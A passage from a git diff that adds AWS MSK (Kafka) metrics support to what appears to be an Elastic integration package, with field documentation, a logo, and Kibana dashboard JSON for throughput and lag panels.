Filters the metric data by consumer group. | keyword | | +| aws.dimensions.Topic | Filters the metric data by topic. | keyword | | +| aws.kafka.metrics.ActiveControllerCount.sum | The total number of active controllers. Only one controller per cluster should be active at any given time. | long | gauge | +| aws.kafka.metrics.BurstBalance.avg | The average remaining balance of input-output burst credits for EBS volumes in the cluster. | long | gauge | +| aws.kafka.metrics.BytesInPerSec.sum | The total number of bytes per second received from clients in the given collection period. | long | gauge | +| aws.kafka.metrics.BytesOutPerSec.sum | The total number of bytes per second sent to clients in the given collection period. | long | gauge | +| aws.kafka.metrics.CPUCreditBalance.avg | The average number of earned CPU credits that a broker has accrued since it was launched. | long | gauge | +| aws.kafka.metrics.ClientConnectionCount.sum | The total number of active authenticated client connections. | long | gauge | +| aws.kafka.metrics.ConnectionCount.sum | The total number of active authenticated, unauthenticated, and inter-broker connections. | long | gauge | +| aws.kafka.metrics.CpuIdle.avg | The average percentage of CPU idle time. | long | gauge | +| aws.kafka.metrics.CpuIoWait.avg | The average percentage of CPU idle time during a pending disk operation. | long | gauge | +| aws.kafka.metrics.CpuSystem.avg | The average percentage of CPU in kernel space. | long | gauge | +| aws.kafka.metrics.CpuUser.avg | The average percentage of CPU in user space. | long | gauge | +| aws.kafka.metrics.EstimatedMaxTimeLag.sum | The total time estimate (in seconds) to drain MaxOffsetLag in the given collection period. | long | gauge | +| aws.kafka.metrics.FetchMessageConversionsPerSec.sum | The total number of fetch message conversions per second for the topic in the given collection period. | long | gauge | +| aws.kafka.metrics.GlobalPartitionCount.sum | The total number of partitions across all topics in the cluster, excluding replicas. | long | gauge | +| aws.kafka.metrics.GlobalTopicCount.sum | The total number of topics across all brokers in the cluster. | long | gauge | +| aws.kafka.metrics.HeapMemoryAfterGC.avg | The average percentage of total heap memory in use after garbage collection. | long | gauge | +| aws.kafka.metrics.KafkaAppLogsDiskUsed.avg | The average percentage of disk space used for application logs. | long | gauge | +| aws.kafka.metrics.KafkaDataLogsDiskUsed.avg | The average percentage of disk space used for data logs. | long | gauge | +| aws.kafka.metrics.LeaderCount.sum | The total number of leaders of partitions per broker, not including replicas. | long | gauge | +| aws.kafka.metrics.MaxOffsetLag.sum | The total maximum offset lag across all partitions in a topic in the given collection period. | long | gauge | +| aws.kafka.metrics.MemoryBuffered.avg | The average size in bytes of buffered memory for the broker. | long | gauge | +| aws.kafka.metrics.MemoryCached.avg | The average size in bytes of cached memory for the broker. | long | gauge | +| aws.kafka.metrics.MemoryFree.avg | The average size in bytes of memory that is free and available for the broker. | long | gauge | +| aws.kafka.metrics.MemoryUsed.avg | The average size in bytes of memory that is in use for the broker. | long | gauge | +| aws.kafka.metrics.MessagesInPerSec.sum | The total number of incoming messages per second for the broker in the given collection period. | long | gauge | +| aws.kafka.metrics.NetworkRxDropped.sum | The total number of dropped receive packages. | long | counter | +| aws.kafka.metrics.NetworkRxErrors.sum | The total number of network receive errors for the broker. | long | counter | +| aws.kafka.metrics.NetworkRxPackets.sum | The total number of packets received by the broker. | long | counter | +| aws.kafka.metrics.NetworkTxDropped.sum | The total number of dropped transmit packages. | long | counter | +| aws.kafka.metrics.NetworkTxErrors.sum | The total number of network transmit errors for the broker. | long | counter | +| aws.kafka.metrics.NetworkTxPackets.sum | The total number of packets transmitted by the broker. | long | counter | +| aws.kafka.metrics.OfflinePartitionsCount.avg | The average number of partitions that are offline in the cluster. | long | gauge | +| aws.kafka.metrics.PartitionCount.avg | The average number of topic partitions per broker, including replicas. | long | gauge | +| aws.kafka.metrics.ProduceMessageConversionsPerSec.sum | The total number of produce message conversions per second for the topic in the given collection period. | long | gauge | +| aws.kafka.metrics.ProduceTotalTimeMsMean.avg | The mean produce time in milliseconds. | long | gauge | +| aws.kafka.metrics.RequestBytesMean.avg | The mean number of request bytes for the broker. | long | gauge | +| aws.kafka.metrics.RequestTime.avg | The average time in milliseconds spent in broker network and I/O threads to process requests. | long | gauge | +| aws.kafka.metrics.RootDiskUsed.avg | The average percentage of the root disk used by the broker. | long | gauge | +| aws.kafka.metrics.SumOffsetLag.sum | The total aggregated offset lag for all the partitions in a topic. | long | gauge | +| aws.kafka.metrics.SwapFree.avg | The average size in bytes of swap memory that is available for the broker. | long | gauge | +| aws.kafka.metrics.SwapUsed.avg | The size in bytes of swap memory that is in use for the broker. | long | gauge | +| aws.kafka.metrics.TrafficShaping.avg | The average number of packets shaped (dropped or queued) due to exceeding network allocations. | long | gauge | +| aws.kafka.metrics.UnderMinIsrPartitionCount.avg | The average number of under minIsr partitions for the broker. | long | gauge | +| aws.kafka.metrics.UnderReplicatedPartitions.avg | The average number of under-replicated partitions for the broker. | long | gauge | +| aws.kafka.metrics.ZooKeeperRequestLatencyMsMean.avg | The mean latency in milliseconds for Apache ZooKeeper requests from broker. | long | gauge | +| aws.tags | Tag key value pairs from aws resources. | flattened | | +| cloud | Fields related to the cloud or infrastructure the events are coming from. | group | | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | | +| cloud.account.name | The cloud account name or alias used to identify different entities in a multi-tenant environment. Examples: AWS account name, Google Cloud ORG display name. | keyword | | +| cloud.availability_zone | Availability zone in which this host, resource, or service is located. | keyword | | +| cloud.image.id | Image ID for the cloud instance. | keyword | | +| cloud.instance.id | Instance ID of the host machine. | keyword | | +| cloud.instance.name | Instance name of the host machine. | keyword | | +| cloud.machine.type | Machine type of the host machine. | keyword | | +| cloud.project.id | The cloud project identifier. Examples: Google Cloud Project id, Azure Project id. | keyword | | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | | +| cloud.region | Region in which this host, resource, or service is located. | keyword | | +| container.id | Unique container id. | keyword | | +| container.image.name | Name of the image the container was built on. | keyword | | +| container.labels | Image labels. | object | | +| container.name | Container name. | keyword | | +| data_stream.dataset | Data stream dataset. | constant_keyword | | +| data_stream.namespace | Data stream namespace. | constant_keyword | | +| data_stream.type | Data stream type. | constant_keyword | | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | | +| error | These fields can represent errors of any kind. Use them for errors that happen while fetching events or in cases where the event itself contains an error. | group | | +| error.message | Error message. | match_only_text | | +| event.dataset | Name of the dataset. If an event source publishes more than one type of log or events (e.g. access log, error log), the dataset is used to specify which one the event comes from. It's recommended but not required to start the dataset name with the module name, followed by a dot, then the dataset name. | constant_keyword | | +| event.module | Event module | constant_keyword | | +| host.architecture | Operating system architecture. | keyword | | +| host.containerized | If the host is a container. | boolean | | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | | +| host.ip | Host ip addresses. | ip | | +| host.mac | Host MAC addresses. The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. | keyword | | +| host.name | Name of the host. It can contain what hostname returns on Unix systems, the fully qualified domain name (FQDN), or a name specified by the user. The recommended value is the lowercase FQDN of the host. | keyword | | +| host.os.build | OS build information. | keyword | | +| host.os.codename | OS codename, if any. | keyword | | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | | +| host.os.name | Operating system name, without the version. | keyword | | +| host.os.name.text | Multi-field of `host.os.name`. | match_only_text | | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | | +| host.os.version | Operating system version as a raw string. | keyword | | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | +| service.type | The type of the service data is collected from. The type can be used to group and correlate logs and metrics from one service type. Example: If logs or metrics are collected from Elasticsearch, `service.type` would be `elasticsearch`. | keyword | | + diff --git a/packages/aws/img/logo_msk.svg b/packages/aws/img/logo_msk.svg new file mode 100644 index 00000000000..43cfc2fcfc5 --- /dev/null +++ b/packages/aws/img/logo_msk.svg @@ -0,0 +1,10 @@ + + + Icon-Architecture/64/Arch_Amazon-Managed-Streaming-for-Apache-Kafka_64 + + + + + + + \ No newline at end of file diff --git a/packages/aws/img/metricbeat-aws-kafka-overview.png b/packages/aws/img/metricbeat-aws-kafka-overview.png new file mode 100644 index 00000000000..e64dbdd3477 Binary files /dev/null and b/packages/aws/img/metricbeat-aws-kafka-overview.png differ diff --git a/packages/aws/kibana/dashboard/aws-401261a0-6a39-11ed-b880-2f1b70138655.json b/packages/aws/kibana/dashboard/aws-401261a0-6a39-11ed-b880-2f1b70138655.json index d89971ca52c..2ad5edc0b96 100644 --- a/packages/aws/kibana/dashboard/aws-401261a0-6a39-11ed-b880-2f1b70138655.json +++ b/packages/aws/kibana/dashboard/aws-401261a0-6a39-11ed-b880-2f1b70138655.json @@ -569,13 +569,13 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Unique count", - "operationType": "unique_count", + "label": "Count of Records", + "operationType": "count", "params": { "emptyAsNull": true }, "scale": "ratio", - "sourceField": "_id" + "sourceField": "___records___" } }, "incompleteColumns": {} diff --git a/packages/aws/kibana/dashboard/aws-62d43b00-d10d-11ee-b93f-db5ae1f208de.json b/packages/aws/kibana/dashboard/aws-62d43b00-d10d-11ee-b93f-db5ae1f208de.json new file mode 100644 index 00000000000..ac29d52a260 --- /dev/null +++ b/packages/aws/kibana/dashboard/aws-62d43b00-d10d-11ee-b93f-db5ae1f208de.json @@ -0,0 +1,1201 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"fc374900-4386-4d57-9d59-8d8b940d0c3d\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"fc374900-4386-4d57-9d59-8d8b940d0c3d\",\"fieldName\":\"aws.dimensions.ClusterName\",\"title\":\"Cluster Name\",\"grow\":true,\"width\":\"medium\",\"selectedOptions\":[],\"enhancements\":{}}},\"4806d559-30dd-4890-b999-8240e9249890\":{\"type\":\"optionsListControl\",\"order\":5,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"4806d559-30dd-4890-b999-8240e9249890\",\"fieldName\":\"aws.dimensions.Topic\",\"title\":\"Topic\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"c0dcfa25-9377-4534-9ae6-8ce5b360ee9c\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"c0dcfa25-9377-4534-9ae6-8ce5b360ee9c\",\"fieldName\":\"cloud.region\",\"title\":\"AWS Region\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"f11a9c4d-2fd7-44bd-8498-239d6cababcf\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"f11a9c4d-2fd7-44bd-8498-239d6cababcf\",\"fieldName\":\"cloud.account.name\",\"title\":\"AWS Account Name\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"2cb60304-88a4-4b96-9fb2-77d0ce255793\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"2cb60304-88a4-4b96-9fb2-77d0ce255793\",\"fieldName\":\"cloud.account.id\",\"title\":\"AWS Account ID\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"8dd0901c-9fb4-4ecd-b4cf-08826c2c4399\":{\"type\":\"optionsListControl\",\"order\":4,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"8dd0901c-9fb4-4ecd-b4cf-08826c2c4399\",\"fieldName\":\"aws.dimensions.ConsumerGroup\",\"title\":\"Consumer Group\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.kafka_metrics" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.kafka_metrics" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "2e36d631-4f6a-47b0-99a4-9b68b5282c49": { + "columnOrder": [ + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc" + ], + "columns": { + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Clusters", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "aws.dimensions.ClusterName" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc", + "colorMode": "None", + "layerId": "2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "76247e8d-26c2-4b43-9aa5-f7dc3d2074cf", + "w": 5, + "x": 0, + "y": 0 + }, + "panelIndex": "76247e8d-26c2-4b43-9aa5-f7dc3d2074cf", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "2e36d631-4f6a-47b0-99a4-9b68b5282c49": { + "columnOrder": [ + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc" + ], + "columns": { + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Consumer Groups", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "aws.dimensions.ConsumerGroup" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc", + "layerId": "2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "bd807a7f-01e5-4b12-9e31-da545c770961", + "w": 5, + "x": 5, + "y": 0 + }, + "panelIndex": "bd807a7f-01e5-4b12-9e31-da545c770961", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "2e36d631-4f6a-47b0-99a4-9b68b5282c49": { + "columnOrder": [ + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc" + ], + "columns": { + "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Topics", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "aws.dimensions.Topic" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "138b5cd5-2d92-4d62-b66b-086fa7f5f7fc", + "layerId": "2e36d631-4f6a-47b0-99a4-9b68b5282c49", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "8c6af195-c6ea-4d12-b7d6-1656b62d2694", + "w": 5, + "x": 10, + "y": 0 + }, + "panelIndex": "8c6af195-c6ea-4d12-b7d6-1656b62d2694", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "6f84123c-552b-4974-851b-628b8a7359b3": { + "columnOrder": [ + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b", + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "columns": { + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of aws.dimensions.Topic", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bdc58faf-bd38-4777-a8b7-08af7a9a17b6", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.Topic" + }, + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "MessagesInPerSec", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "aws.kafka.metrics.MessagesInPerSec.sum" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "layerId": "6f84123c-552b-4974-851b-628b8a7359b3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "xAccessor": "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b" + } + ], + "legend": { + "floatingColumns": 1, + "isInside": true, + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 15, + "i": "dd04e422-baf3-45cb-ae3e-87811250354a", + "w": 33, + "x": 15, + "y": 0 + }, + "panelIndex": "dd04e422-baf3-45cb-ae3e-87811250354a", + "title": "MSKBytesInPerSec", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "6f84123c-552b-4974-851b-628b8a7359b3": { + "columnOrder": [ + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b", + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "columns": { + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of aws.dimensions.Topic", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bdc58faf-bd38-4777-a8b7-08af7a9a17b6", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.Topic" + }, + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "BytesInPerSec", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "aws.kafka.metrics.BytesInPerSec.sum" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "layerId": "6f84123c-552b-4974-851b-628b8a7359b3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "xAccessor": "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b" + } + ], + "legend": { + "floatingColumns": 1, + "isInside": true, + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 15, + "i": "2b223bf3-4ce1-4712-9239-375da4bccadd", + "w": 24, + "x": 0, + "y": 15 + }, + "panelIndex": "2b223bf3-4ce1-4712-9239-375da4bccadd", + "title": "MSKBytesInPerSec", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "6f84123c-552b-4974-851b-628b8a7359b3": { + "columnOrder": [ + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b", + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "columns": { + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of aws.dimensions.Topic", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bdc58faf-bd38-4777-a8b7-08af7a9a17b6", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.Topic" + }, + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "BytesOutPerSec", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "aws.kafka.metrics.BytesOutPerSec.sum" + } + }, + "incompleteColumns": {}, + "indexPatternId": "metrics-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "layerId": "6f84123c-552b-4974-851b-628b8a7359b3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "xAccessor": "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b" + } + ], + "legend": { + "floatingColumns": 1, + "isInside": true, + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 15, + "i": "60a4dc4d-a16a-46e7-b10b-456035625ecf", + "w": 24, + "x": 24, + "y": 15 + }, + "panelIndex": "60a4dc4d-a16a-46e7-b10b-456035625ecf", + "title": "MSKBytesInPerSec", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6f84123c-552b-4974-851b-628b8a7359b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "6f84123c-552b-4974-851b-628b8a7359b3": { + "columnOrder": [ + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b", + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b", + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6" + ], + "columns": { + "3e430cab-c503-4bf0-aa2b-c4f2d2e54f8b": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of aws.dimensions.Topic", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bdc58faf-bd38-4777-a8b7-08af7a9a17b6", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "aws.dimensions.Topic" + }, + "50dd5ad4-08fa-4cf7-85d2-d1e40e02505b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdc58faf-bd38-4777-a8b7-08af7a9a17b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "EstimatedMaxTimeLag", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "duration", + "params": { + "decimals": 0, + "toUnit": "asSeconds" + } + } + }, + "scale": "ratio", + "sourceField": "aws.kafka.metrics.EstimatedMaxTimeLag.sum" + } + 